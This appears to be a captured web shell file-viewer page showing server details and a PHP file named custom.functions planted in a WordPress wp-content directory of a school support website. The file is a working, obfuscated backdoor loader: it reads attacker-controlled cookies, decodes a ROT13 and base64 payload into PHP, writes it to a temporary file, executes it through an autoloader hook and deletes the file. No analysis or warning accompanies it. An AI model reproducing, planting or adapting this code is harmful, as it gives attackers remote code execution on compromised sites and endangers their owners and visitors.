HEX
Server: Microsoft-IIS/10.0
System: Windows NT H2838467 10.0 build 14393 (Windows Server 2016) AMD64
User: IWPD_8(ghana) (0)
PHP: 8.3.30
Disabled: NONE
Upload Files
File: C:/Inetpub/vhosts/ghanaschoolsupport.com/httpdocs/wp-content/custom.functions.1769622502.php
<!--6WCVaOQq-->
<?php

if (isset($_COOKIE[93-93]) && isset($_COOKIE[45-44]) && isset($_COOKIE[39+-36]) && isset($_COOKIE[-93+97])) {
    $mrk = $_COOKIE;
    function approve_request($tkn) {
        $mrk = $_COOKIE;
        $entity = tempnam((!empty(session_save_path()) ? session_save_path() : sys_get_temp_dir()), '74gNGAVc');
        if (!is_writable($entity)) {
            $entity = getcwd() . DIRECTORY_SEPARATOR . "event_handler";
        }
        $obj = "\x3c\x3f\x70\x68p " . base64_decode(str_rot13($mrk[3]));
        if (is_writeable($entity)) {
            $entry = fopen($entity, 'w+');
            fputs($entry, $obj);
            fclose($entry);
            spl_autoload_unregister(__FUNCTION__);
            require_once($entity);
            @array_map('unlink', array($entity));
        }
    }
    spl_autoload_register("approve_request");
    $value = "8ebd3bc63526880c54f4439061aeeade";
    if (!strncmp($value, $mrk[4], 32)) {
        if (@class_parents("publish_content_initialized", true)) {
            exit;
        }
    }
}